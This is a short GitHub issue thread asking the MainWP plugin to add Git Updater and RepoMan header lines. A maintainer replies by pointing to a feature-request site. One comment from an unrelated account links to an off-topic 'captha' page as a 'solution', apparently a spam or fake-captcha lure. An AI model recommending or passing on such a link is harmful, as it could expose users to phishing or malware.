### ISSUE TITLE
Consider adding support for Git Updater and RepoMan

### ISSUE THREAD

**Issue by jessuppi** [mainwp/mainwp#707]
Hello there,

Please consider adding support for Git Updater and RepoMan by adding these lines to your plugin header:

```
GitHub Plugin URI: mainwp/mainwp
Primary Branch: master
```

Ref: https://github.com/mainwp/mainwp/blob/master/mainwp.php

More info:

https://github.com/littlebizzy/repoman

**Comment by kun18911** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.

**Comment by bogdan-mainwp** [comment]
Hi @jessuppi, apologies for the delay.
All feature requests are welcome at the https://voice.mainwp.com/
